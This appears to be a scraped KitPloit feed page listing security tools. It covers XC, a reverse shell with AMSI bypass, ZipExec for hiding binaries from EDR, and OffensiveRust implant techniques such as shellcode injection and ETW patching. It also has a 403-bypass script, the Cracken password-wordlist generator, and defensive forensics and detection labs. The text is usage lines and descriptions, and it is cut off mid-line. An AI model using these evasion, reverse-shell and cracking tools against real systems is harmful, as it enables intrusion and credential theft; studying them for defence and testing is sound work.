πŸ”’
There are new articles available, click to refresh the page.
Today β€” 1 December 2021KitPloit - PenTest & Hacking Tools

XC - A Small Reverse Shell For Linux And Windows

1 December 2021 at 11:30
By: Zion3R


Netcat like reverse shell for Linux & Windows.


Features

Windows

Usage:
β”” Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
β”” OS Specific Commands:
!powe rshell
* starts powershell with AMSI Bypass
!rc <port>
* connects to a local bind shell and restarts this client over it
!runasps <username> <password> <domain>
* restart xc with the specified user using powershell
!vulns
* checks for common vulnerabilities

Linux

Usage:
β”” Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
β”” OS Specific Commands:
!ssh < port>
* starts sshd with the configured keys on the specified port

Examples

  • Linux Attacker: rlwrap xc -l -p 1337 (Server)
  • WindowsVictim : xc.exe 10.10.14.4 1337 (Client)
  • Argumentless: xc_10.10.14.4_1337.exe (Client)

Setup

Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: go version go1.16.2 linux/amd64 and kali go version go1.15.9 linux/amd64

git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
sudo apt-get install rlwrap upx

Linux:

python3 build.py

Known Issues

  • When !lfwd fails due to lack of permissions (missing sudo), the entry in !lsfwd is still created
  • Can't Ctrl+C out of powershell started from !shell
  • !net (execute-assembly) fails after using it a few times - for now you can !restart and it might work again
  • Tested:
    • Kali (Attacker) Win 10 (Victim)

Credits



Yesterday β€” 30 November 2021KitPloit - PenTest & Hacking Tools

ZipExec - A Unique Technique To Execute Binaries From A Password Protected Zip

30 November 2021 at 20:30
By: Zion3R


ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.


Installation

The first step as always is to clone the repo. Before you compile ZipExec you'll need to install the dependencies. To install them, run following commands:

go get github.com/yeka/zip

Then build it

go build ZipExec.go

or

go get github.com/Tylous/ZipExec

Help

sandbox evasion using IsDomainedJoined. ">
./ZipExec -h

__________.__ ___________
\____ /|__|_____\_ _____/__ ___ ____ ____
/ / | \____ \| __)_\ \/ // __ \_/ ___\
/ /_ | | |_> > \> <\ ___/\ \___
/_______ \|__| __/_______ /__/\_ \\___ >\___ >
\/ |__| \/ \/ \/ \/
(@Tyl0us)

Usage of ./ZipExec:
-I string
Path to the file containing binary to zip.
-O string
Name of output file (e.g. loader.js)
-sandbox
Enables sandbox evasion using IsDomainedJoined.


Kit_Hunter - A Basic Phishing Kit Scanner For Dedicated And Semi-Dedicated Hosting

30 November 2021 at 11:30
By: Zion3R


Kit Hunter: A basic phishing kit detection tool

  • Version 2.6.0
  • 28 September 2021

Testing and development took place on Python 3.7.3 (Linux)


What is Kit Hunter?

Kit Hunter is a personal project to learn Python, and a basic scanning tool that will search directories and locate phishing kits based on established markers. As detection happens, a report is generated for administrators.

By default the script will generate a report that shows the files that were detected as potentially problematic, list the markers that indicated them as problematic (a.k.a. tags), and then show the exact line of code where the detection happened.

Usage:

Detailed installation and usage instructions are available at SteveD3.io

Help

To get quick help: python3 kit_hunter_2.py -h

Default scan

To launch a full scan using the default settings: python3 kit_hunter_2.py

Quick scan

To launch a quick scan, using minimal detection rules: python3 kit_hunter_2.py -q

Custom scan

To launch a custom scan: python3 kit_hunter_2.py -c

Note: When using the -c switch, you must place a tag file in the same location as Kit Hunter. You can name this file whatever you want, but the extension must be .tag. Please remember that the formatting is important. There should only be one item per line, and no whitespaces. You can look at the other tag files if you need examples.

Directory selected scanning

You can run kit_hunter_2.py from any location using the -d switch to select a directory to scan:

python3 kit_hunter_2.py -d /path/to/directory

However, it is easier if you place kit_hunter_2.py in the directory above your web root (e.g. /www/ or /public_html/) and call the script from there.

The final report will be generated in the directory being scanned.

In my usage, I call Kit Hunter from my /kit/download/ directory where new phishing kits are saved. My reports are then generated and saved to that folder. However, if I call Kit Hunter and scan my /PHISHING/Archive/ folder using the -d switch, then the report will save to /PHISHING/Archive/.

Shell detection

This latest release of Kit Hunter comes with shell detection. Shell scripts are often packaged with phishing kits, or used to deploy phishing kits on webservers. Kit Hunter will scan for some common shell script elements. The process works exactly the same way as regular scanning, only the shell detections are called with the -s switch. This is a standalone scan, so you can't run it with other types. You can however leverage the -m and -l flags with shell scanning. See the script's help section for more details.

Once scanning is complete, output from the script will point you to the location of the saved scan report.

Tag Files:

When it comes to the tag files, there are 41 tag files shipping with v2.5.8 Kit Hunter. These tag files detect targeted phishing campaigns, as well as various types of phishing tricks, such as obfuscation, templating, theming, and even branded kits like Kr3pto and Ex-Robotos. New tag files will be added, and existing tag files will be updated on a semi-regular basis. See the changelog for details.

As was the case with v1.0, the longer the tag file is, the longer it will take for the script to read it.



Before yesterdayKitPloit - PenTest & Hacking Tools

Digital-Forensics-Lab - Free Hands-On Digital Forensics Labs For Students And Faculty

29 November 2021 at 20:30
By: Zion3R


Features of Repository

===================

  • Hands-on Digital Forensics Labs: designed for Students and Faculty
  • Linux-based lab: All labs are purely based on Kali Linux
  • Lab screenshots: Each lab has PPTs with instruction screenshots
  • Comprehensive: Cover many topics in digital forensics
  • Free: All tools are open source
  • Updated: The project is funded by DOJ and will keep updating
  • Two formalized forensic intelligence in JSON files based-on case studies

Table of Contents (updating)

# The following commands will install all tools needed for Data Leakage Case. We will upgrade the script to add more tools for other labs soon.

wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh
chmod +x tool-install-zsh.sh
./tool-install-zsh.sh


Investigating P2P Data Leakage

==============

The P2P data leakage case study is to help students to apply various forensic techniques to investigate intellectual property theft involving P2P. The study include

  • A large and complex case involving a uTorrent client. The case is similar to NIST data leakage lab. However, it provides a clearer and more detailed timeline.
  • Solid evidence with explanations. Each evidence that is associated with each activity is explained along with the timeline. We suggest using this before study NIST data leakage case study.
  • 10 hands-on labs/topics in digital forensics

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Lab Environment Setting Up 4M
Lab 1 Disk Image and Partitions 5M
Lab 2 Windows Registry and File Directory 15M
Lab 3 MFT Timeline 6M
Lab 4 USN Journal Timeline 3M
Lab 5 uTorrent Log File 9M
Lab 6 File Signature 8M
Lab 7 Emails 9M
Lab 8 Web History 11M
Lab 9 Website Analysis 2M
Lab 10 Timeline (Summary) 13K

Investigating NIST Data Leakage

==============

The case study is to investigate an image involving intellectual property theft. The study include

  • A large and complex case study created by NIST. You can access the Senario, DD/Encase images. You can also find the solutions on their website.
  • 14 hands-on labs/topics in digital forensics

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Environment Setting Up 2M
Lab 1 Windows Registry 3M
Lab 2 Windows Event and XML 3M
Lab 3 Web History and SQL 3M
Lab 4 Email Investigation 3M
Lab 5 File Change History and USN Journal 2M
Lab 6 Network Evidence and shellbag 2M
Lab 7 Network Drive and Cloud 5M
Lab 8 Master File Table ($MFT) and Log File ($logFile) Analysis 13M
Lab 9 Windows Search History 4M
Lab 10 Windows Volume Shadow Copy Analysis 6M
Lab 11 Recycle Bin and Anti-Forensics 3M
Lab 12 Data Carving 3M
Lab 13 Crack Windows Passwords 2M

Investigating Illegal Possession of Images

=====================

The case study is to investigate the illegal possession of Rhino images. This image was contributed by Dr. Golden G. Richard III, and was originally used in the DFRWS 2005 RODEO CHALLENGE. NIST hosts the USB DD image. A copy of the image is also available in the repository.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 HTTP Analysis using Wireshark (text) 3M
Lab 1 HTTP Analysis using Wireshark (image) 6M
Lab 2 Rhion Possession Investigation 1: File recovering 9M
Lab 3 Rhion Possession Investigation 2: Steganography 4M
Lab 4 Rhion Possession Investigation 3: Extract Evidence from FTP Traffic 3M
Lab 5 Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic 5M

Investigating Email Harassment

=========

The case study is to investigate the harassment email sent by a student to a faculty member. The case is hosted by digitalcorpora.org. You can access the senario description and network traffic from their website. The repository only provides lab instructions.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Investigating Harassment Email using Wireshark 3M
Lab 1 t-shark Forensic Introduction 2M
Lab 2 Investigating Harassment Email using t-shark 2M

Investigating Illegal File Transferring (Memory Forensics )

=========

The case study is to investigate computer memory for reconstructing a timeline of illegal data transferring. The case includes a scenario of transfer sensitive files from a server to a USB.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Memory Forensics 11M
part 1 Understand the Suspect and Accounts
part 2 Understand the Suspect’s PC
part 3 Network Forensics
part 4 Investigate Command History
part 5 Investigate Suspect’s USB
part 6 Investigate Internet Explorer History
part 7 Investigate File Explorer History
part 8 Timeline Analysis

Investigating Hacking Case

=========

The case study, including a disk image provided by NIST is to investigate a hacker who intercepts internet traffic within range of Wireless Access Points.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Hacking Case 8M

Investigating Android 10

The image is created by Joshua Hickman and hosted by digitalcorpora.

=========

Labs Topics Covered Size of PPTs
Lab 0 Intro Pixel 3 3M
Lab 1 Pixel 3 Image 2M
Lab 2 Pixel 3 Device 4M
Lab 3 Pixel 3 System Setting 5M
Lab 4 Overview: App Life Cycle 11M
Lab 5.1.1 AOSP App Investigations: Messaging 4M
Lab 5.1.2 AOSP App Investigations: Contacts 3M
Lab 5.1.3 AOSP App Investigations: Calendar 1M
Lab 5.2.1 GMS App Investigations: Messaging 6M
Lab 5.2.2 GMS App Investigations: Dialer 2M
Lab 5.2.3 GMS App Investigations: Maps 8M
Lab 5.2.4 GMS App Investigations: Photos 6M
Lab 5.3.1 Third-Party App Investigations: Kik 4M
Lab 5.3.2 Third-Party App Investigations: textnow 1M
Lab 5.3.3 Third-Party App Investigations: whatapp 3M
Lab 6 Pixel 3 Rooting 5M

Tools Used

========

Name version vendor
Wine 6.0 https://source.winehq.org/git/wine.git/
Vinetto 0.98 https://github.com/AtesComp/Vinetto
imgclip 05.12.2017 https://github.com/Arthelon/imgclip
Tree 06.01.2020 https://github.com/kddeisz/tree
RegRipper 3.0 https://github.com/keydet89/RegRipper3.0
Windows-Prefetch-Parser 05.01.2016 https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git
python-evtx 05.21.2020 https://github.com/williballenthin/python-evtx
xmlstarlet 1.6.1 https://github.com/fishjam/xmlstarlet
hivex 09.15.2020 https://github.com/libguestfs/hivex
libesedb 01.01.2021 https://github.com/libyal/libesedb
pasco-project 02.09.2017 https://annsli.github.io/pasco-project/
libpff 01.17.2021 https://github.com/libyal/libpff
USN-Record-Carver 05.21.2017 https://github.com/PoorBillionaire/USN-Record-Carver
USN-Journal-Parser 1212.2018 https://github.com/PoorBillionaire/USN-Journal-Parser
JLECmd 1.4.0.0 https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip
libnl-utils 3.2.27 https://packages.ubuntu.com/xenial/libs/libnl-utils
time_decode 12.13.2020 https://github.com/digitalsleuth/time_decode
analyzeMFT 2.0.4 https://github.com/dkovar/analyzeMFT
libvshadow 12.20.2020 https://github.com/libyal/libvshadow
recentfilecache-parser 02.13.2018 https://github.com/prolsen/recentfilecache-parser

Contribution

=============

  • Frank Xu
  • Malcolm Hayward
  • Richard (Max) Wheeless

Free hands-on digital forensics labs for students and faculty (3)



OffensiveRust - Rust Weaponization For Red Team Engagements

29 November 2021 at 11:30
By: Zion3R


My experiments in weaponizing Rust for implant development and general offensive operations.


Why Rust?

  • It is faster than languages like C/C++
  • It is multi-purpose language, bearing excellent communities
  • It has an amazing inbuilt dependency build management called Cargo
  • It is LLVM based which makes it a very good candidate for bypassing static AV detection
  • Super easy cross compilation to Windows from *nix/MacOS, only requires you to install the mingw toolchain, although certain libraries cannot be compiled successfully in other OSes.

Examples in this repo

File Description
Allocate_With_Syscalls It uses NTDLL functions directly with the ntapi Library
Create_DLL Creates DLL and pops up a msgbox, Rust does not fully support this so things might get weird since Rust DLL do not have a main function
DeviceIoControl Opens driver handle and executing DeviceIoControl
EnableDebugPrivileges Enable SeDebugPrivilege in the current process
Shellcode_Local_inject Executes shellcode directly in local process by casting pointer
Execute_With_CMD Executes cmd by passing a command via Rust
ImportedFunctionCall It imports minidump from dbghelp and executes it
Kernel_Driver_Exploit Kernel Driver exploit for a simple buffer overflow
Named_Pipe_Client Named Pipe Client
Named_Pipe_Server Named Pipe Server
Process_Injection_CreateThread Process Injection in remote process with CreateRemoteThread
Unhooking Unhooking calls
asm_syscall Obtaining PEB address via asm
base64_system_enum Base64 encoding/decoding strings
http-https-requests HTTP/S requests by ignoring cert check for GET/POST
patch_etw Patch ETW
ppid_spoof Spoof parent process for created process
tcp_ssl_client TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
tcp_ssl_server TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
wmi_execute Executes WMI query to obtain the AV/EDRs in the host
Windows.h+ Bindings This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
UUID_Shellcode_Execution Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.

Compiling the examples in this repo

This repository does not provide binaries, you're gonna have to compile them yourself.

Install Rust
Simply download the binary and install.

This repo was compiled in Windows 10 so I would stick to it. As mentioned OpenSSL binaries will have depencency issues that will require OpenSSL and perl to be installed. For the TCP SSL client/server I recommend static build due to dependencies on the hosts you will execute the binaries. For creating a project, execute:
cargo new <name> This will automatically create the structured project folders with:

project
β”œβ”€β”€ Cargo.toml
└── src
└── main.rs

Cargo.toml is the file that contains the dependencies and the configuration for the compilation. main.rs is the main file that will be compiled along with any potential directories that contain libraries.

For compiling the project, go into the project directory and execute:
cargo build

This will use your default toolchain. If you want to build the final "release" version execute:
cargo build --release

For static binaries, in terminal before the build command execute:
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"
set RUSTFLAGS=-C target-feature=+crt-static

In case it does not feel easy for you to read my code the way it is written,
you can also you the below command inside the project directory to format it in a better way
cargo fmt

Certain examples might not compile and give you some error, since it might require a nightly
build of Rust with the latest features. To install it just do:
rustup default nightly

The easiest place to find the dependencies or Crates as they are called.

Cross Compiling

Cross-Compiling requires to follow the instructions here By installing different toolchains, you can cross compile with the below command
cargo build --target <toolchain>

To see the installed toolchains on your system do:
rustup toolchain list

For checking all the available toolchains you can install in your system do:
rustup target list

For installing a new toolchain do:
rustup target add <toolchain_name>

Optimizing executables for size

This repo contains a lot of configuration options and ideas about reducing the file size. Static binaries are usually quite big.

Pitfalls I found myself falling into

Careful of \0 bytes, do not forget them for strings in memory, I spent a lot of my time but windbg always helped resolving it.

Interesting Rust libraries

  • WINAPI
  • WINAPI2
  • Windows - This is the official Microsoft one that I have not played much with

OPSEC

  • Even though Rust has good advantages it is quite difficult to get used to it and it ain't very intuitive.
  • Shellcode generation is another issue due to LLVM. I have found a few ways to approach this.
    Donut sometimes does generate shellcode that works but depending on how the project is made, it might not.
    In general, for shellcode generation the tools that are made should be made to host all code in .text segment, which leads to this amazing repo. There is a shellcode sample in this project that can show you how to structure your code for successfull shellcode generation.
    In addition, this project also has a shellcode generator that grabs the .text segment of a binary and and dumps the shellcode after executing some patches.
    This project grabs from a specific location the binary so I made a fork that receives the path of the binary as an argument here.
  • Even if you remove all debug symbols, rust can still keep references to your home directory in the binary. The only way I've found to remove this is to pass the following flag: --remap-path-prefix {your home directory}={some random identifier}. You can use bash variables to get your home directory and generate a random placeholder: --remap-path-prefix "$HOME"="$RANDOM". (By Yamakadi)
  • Although for the above there is another way to remove info about the home directory by adding at the top of Cargo.toml
    cargo-features = ["strip"] .
  • Since Rust by default leaves a lot of things as strings in the binary, I mostly use this cargo.toml to avoid them and also reduce size
    with build command
    cargo build --release -Z build-std=std,panic_abort -Z build-std-features=panic_immediate_abort --target x86_64-pc-windows-msvc

Other projects I have have made in Rust

Projects in Rust that can be hepfull

  • houdini - Helps make your executable self-delete


DetectionLabELK - A Fork From DetectionLab With ELK Stack Instead Of Splunk

28 November 2021 at 20:30
By: Zion3R


DetectionLabELK is a fork from Chris Long's DetectionLab with ELK stack instead of Splunk.


Description:

DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.

Use cases:

A popular use case for DetectionLabELK is when you consider adopting MITRE ATT&CK framework and would like to develop detections for its tactics. You can use DetectionLabELK to quickly run atomic tests, see what logs are being generated and compare it to your production environment. This way you can:

  • Validate that your production logging is working as expected.
  • Ensure that your SIEM is collecting the correct events.
  • Enhance alerts quality by reducing false positives and eliminating false negatives.
  • Minimize coverage gaps.

Lab Information:

Primary Lab Features:

  • Microsoft Advanced Threat Analytics is installed on the WEF machine, with the lightweight ATA gateway installed on the DC
  • Windoes Evenet forwarder along with Winlogbeat are pre-installed and all indexes are pre-created on ELK. Technology add-ons for Windows are also preconfigured.
  • A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
  • Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
  • Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs
  • osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
  • Sysmon is installed and configured using Olaf's open-sourced configuration
  • All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
  • SMBv1 Auditing is enabled

Lab Hosts:

  1. DC - Windows 2016 Domain Controller

    • WEF Server Configuration GPO
    • Powershell logging GPO
    • Enhanced Windows Auditing policy GPO
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards Sysmon & osquery)
    • Sysinternals Tools
    • Microsft Advanced Threat Analytics Lightweight Gateway
  2. WEF - Windows 2016 Server

    • Microsoft Advanced Threat Analytics
    • Windows Event Collector
    • Windows Event Subscription Creation
    • Powershell transcription logging share
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards WinEventLog & Powershell & Sysmon & osquery)
    • Sysinternals tools
  3. Win10 - Windows 10 Workstation

    • Simulates employee workstation
    • Sysmon
    • osquery
    • Sysinternals Tools
  4. Logger - Ubuntu 18.04

    • Kibana
    • Fleet osquery Manager
    • Bro
    • Suricata
    • Elastic Beats Forwarder (Forwards Bro logs & Suricata & osquery)
    • Guacamole
    • Velociraptor

Requirements

  • 55GB+ of free disk space
  • 16GB+ of RAM
  • Vagrant 2.2.2 or newer
  • Virtualbox

Deployment Options

  1. Use Vagrant Cloud Boxes - ETA ~2 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install the Vagrant-Reload plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK/Vagrant" and execute vagrant up.
  2. Build Boxes From Scratch - ETA ~5 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install "Vagrant-Reload" plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK" base directory and build the lab by executing ./build.sh virtualbox (Mac & Linux) or ./build.ps1 virtualbox (Windows).

Troubleshooting:

  • To verify that building process completed successfully, ensure you are in DetectionLabELK/Vagrant directory and run vagrant status. The four machines (wef,dc,logger and win10) should be running. if one of the machines was not running, execute vagrant reload <host>. If you would like to pause the whole lab, execute vagrant suspend and resume it using vagrant resume.
  • Deployment logs will be present in the Vagrant folder as vagrant_up_<host>.log

Lab Access:

Support: If you face any problem, please open a new issue and provide relevant log file.



4-ZERO-3 - 403/401 Bypass Methods + Bash Automation

28 November 2021 at 11:30
By: Zion3R


>_ Introduction

4-ZERO-3 Tool to bypass 403/401. This script contain all the possible techniques to do the same.

  • NOTE : If you see multiple [200 Ok]/bypasses as output, you must check the Content-Length. If the content-length is same for multiple [200 Ok]/bypasses means false positive. Reason can be "301/302" or "../" [Payload] DON'T PANIC.
  • Script will print cURL PAYLOAD if possible bypass found.

>_ Preview



>_ Help

[email protected]_dheeraj:$ bash 403-bypass.sh -h



Β 

>_ Usage / Modes

  • Scan with specific payloads:
    • [ --header ] Support HEADER based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --header
    • [ --protocol ] Support PROTOCOL based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --protocol
    • [ --port ] Support PORT based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --port
    • [ --HTTPmethod ] Support HTTP Method based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --HTTPmethod
    • [ --encode ] Support URL Encoded bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --encode
    • [ --SQLi ] Support MySQL mod_Security & libinjection bypasses/payloads [** New **]
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --SQLi
  • Complete Scan {includes all exploits/payloads} for an endpoint [ --exploit ]
[email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --exploit
Prerequisites
  • apt install curl [Debian]


Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool

27 November 2021 at 20:30
By: Zion3R

Cracken is a fast password wordlist generator, Smartlist creation and password hybrid-mask analysis tool written in pure safe Rust (more on talk/). Inspired by great tools like maskprocessor, hashcat, Crunch and

ο€— HuggingFace's tokenizers.

What? Why? Woot??

At DeepSec2021 we presented a new method for analysing passwords as Hybrid-Masks exploiting common substrings in passwords by utilizing NLP tokenizers (more info on talk/).

Our method splits a password into its subwords instead of just a characters mask. HelloWorld123! splitted into ['Hello', 'World', '123!'] as these three subwords are very common in other passwords.

Hybrid Masks & Smartlists

  • Smartlists - Compact & representative subword lists created from passwords by utilizing NLP tokenizers
  • Hybrid-Mask - A representation of a password as a combination of wordlists & characters (e.g. ?w1?w2?l?d)

Analyzing RockYou Passwords with Smartlists & Hybrid-Masks:

full table here

Cracken

is used for:

  • Generating Hybrid-Masks very VERY FAST ο¦Έ (see performance section)
  • Building Smartlists - compact & representative list of subwords from given passwords files (using ο€— HuggingFace's tokenizers)
  • Analyzing passwords for their Hybrid-Masks - building statistics for better password candidates (again very fast)

Possible workflows with Cracken:

Simple:

  1. Generate wordlist candidates from a hybrid mask - e.g. cracken -w rockyou.txt -w 100-most-common.txt '?w1?w2?d?d?d?d?s'
  2. You can pipe the passwords Cracken generates into hashcat, john or your favorite password cracker

Advanced:

  1. Create a Smartlist from existing passwords - cracken create
  2. Analyze a passwords list of plaintext passwords - cracken entropy
  3. use most frequent Hybrid-Masks to generate password candidates fast - cracken generate -i hybrid-masks.txt

For more details see Usage section

Getting Started

download (linux only currently): latest release

for more installation options see installation section

run Cracken:

generate all words of length 8 starting with uppercase followed by 6 lowercase chars and then a digit:

$ cracken -o pwdz.lst '?u?l?l?l?l?l?l?d'

generate words from two wordlists with year suffix (1000-2999) <firstname><lastname><year>

$ cracken --wordlist firstnames.txt --wordlist lastnames.lst --charset '12' '?w1?w2?1?d?d?d'

create a Smartlist of size 50k from subwords extracted from rockyou.txt

$ cracken create -f rockyou.txt -m 50000 --smartlist smart.lst

estimate the entropy of hybrid mask of the password HelloWorld123! using a smartlist

$ cracken entropy -f smart.lst 'HelloWorld123!'

hybrid-min-split: ["hello", "world1", "2", "3", "!"]
hybrid-mask: ?w1?w1?d?d?s
hybrid-min-entropy: 42.73
--
charset-mask: ?l?l?l?l?l?l?l?l?l?l?d?d?d?s
charset-mask-entropy: 61.97

Performance

As of writing this, Cracken is probably the world's fastest wordlist generator:



Cracken has around 25% increased performance over hashcat's fast maskprocessor thats written in C.

Cracken can generate around 2 GB/s per core.

more details on benchmarks/

Why speed is important? A typical GPU can test billions passwords per second depending on the password hash function. When the wordlist generator produces fewer words per second than the cracking tool can handle - the cracking speed will degrade.

Hybrid-Masks Analysis Performance

Cracken uses A* algorithm to analyze passwords very fast. it can find the minimal Hybrid-Mask of passwords file at rate of ~100k Passwords/sec (cracken entropy -f words1.txt -f words2.txt ... -p pwds.txt)

Installation

install Cracken or compile from source

Download Binary (Linux Only Currently)

download latest release from releases

Build From Source (All Platforms)

Cracken is written in Rust and needs rustc to get compiled. Cracken should support all Platforms that Rust support.

installation instructions for cargo

there are two options building from source - installing with cargo from crates.io (preferred) or compiling manually from source.

1. install from crates.io (preferred)

install with cargo:

$ cargo install cracken

2. build from source

clone Cracken:

$ git clone https://github.com/shmuelamar/cracken

build Cracken:

$ cd cracken
$ cargo build --release

run it:

$ ./target/release/cracken --help

Usage Info

generator USAGE: cracken [SUBCOMMAND] FLAGS: -h, --help Prints help information -V, --version Prints version information SUBCOMMANDS: generate (default) - Generates newline separated words according to given mask and wordlist files create Create a new smartlist from input file(s) entropy Computes the estimated entropy of password or password file. The entropy of a password is the log2(len(keyspace)) of the password. There are two types of keyspace size estimations: * mask - keyspace of each char (digit=10, lowercase=26...). * hybrid - finding minimal split into subwords and charsets. For specific subcommand help run: cracken <subcommand> --help Example Usage: ## Generate Subcommand Examples: # all digits from 00000000 to 99999999 cracken ?d?d?d?d?d?d?d?d # all digits from 0 to 99999999 cracken -m 1 ?d?d?d?d?d?d?d?d # words with pwd prefix - pwd0000 to pwd9999 cracken pwd?d?d?d?d # all passwords of length 8 starting with upper then 6 lowers then digit cracken ?u?l?l?l?l?l?l?d # same as above, write output to pwds.txt instead of stdout cracken -o pwds.txt ?u?l?l?l?l?l?l?d # custom charset - all hex values cracken -c 0123456789abcdef '?1?1?1?1' # 4 custom charsets - the order determines the id of the charset cracken -c 01 -c ab -c de -c ef '?1?2?3?4' # 4 lowercase chars with years 2000-2019 suffix cracken -c 01 '?l?l?l?l20?1?d' # starts with firstname from wordlist followed by 4 digits cracken -w firstnames.txt '?w1?d?d?d?d' # starts with firstname from wordlist with lastname from wordlist ending with symbol cracken -w firstnames.txt -w lastnames.txt -c '[email protected]#$' '?w1?w2?1' # repeating wordlists multiple times and combining charsets cracken -w verbs.txt -w nouns.txt '?w1?w2?w1?w2?w2?d?d?d' ## Create Smartlists Subcommand Examples: # create smartlist from single file into smart.txt cracken create -f rockyou.txt --smartlist smart.txt # create smartlist from multiple files with multiple tokenization algorithms cracken create -t bpe -t unigram -t wordpiece -f rockyou.txt -f passwords.txt -f wikipedia.txt --smartlist smart.txt # create smartlist with minimum subword length of 3 and max numbers-only subwords of size 6 cracken create -f rockyou.txt --min-word-len 3 --numbers-max-size 6 --smartlist smart.txt ## Entropy Subcommand Examples: # estimating entropy of a password cracken entropy --smartlist vocab.txt 'helloworld123!' # estimating entropy of a passwords file with a charset mask entropy (default is hybrid) cracken entropy --smartlist vocab.txt -t charset -p passwords.txt # estimating the entropy of a passwords file cracken entropy --smartlist vocab.txt -p passwords.txt cracken-v1.0.0 linux-x86_64 compiler: rustc 1.56.1 (59eed8a2a 2021-11-01) more info at: https://github.com/shmuelamar/cracken ">
$ cracken --help
Cracken v1.0.0 - a fast password wordlist generator

USAGE:
cracken [SUBCOMMAND]

FLAGS:
-h, --help Prints help information
-V, --version Prints version information

SUBCOMMANDS:
generate (default) - Generates newline separated words according to given mask and wordlist files
create Create a new smartlist from input file(s)
entropy
Computes the estimated entropy of password or password file.
The entropy of a password is the log2(len(keyspace)) of the password.

There are two types of keyspace size estimations:
* mask - keyspace of each char (digit=10, lowercase=26...).
* hybrid - finding minimal split into subwords and charsets.


For specific subcommand help run: cracken <subcommand> --help


Example U sage:

## Generate Subcommand Examples:

# all digits from 00000000 to 99999999
cracken ?d?d?d?d?d?d?d?d

# all digits from 0 to 99999999
cracken -m 1 ?d?d?d?d?d?d?d?d

# words with pwd prefix - pwd0000 to pwd9999
cracken pwd?d?d?d?d

# all passwords of length 8 starting with upper then 6 lowers then digit
cracken ?u?l?l?l?l?l?l?d

# same as above, write output to pwds.txt instead of stdout
cracken -o pwds.txt ?u?l?l?l?l?l?l?d

# custom charset - all hex values
cracken -c 0123456789abcdef '?1?1?1?1'

# 4 custom charsets - the order determines the id of the charset
cracken -c 01 -c ab -c de -c ef '?1?2?3?4'

# 4 lowercase chars with years 2000-2019 suffix
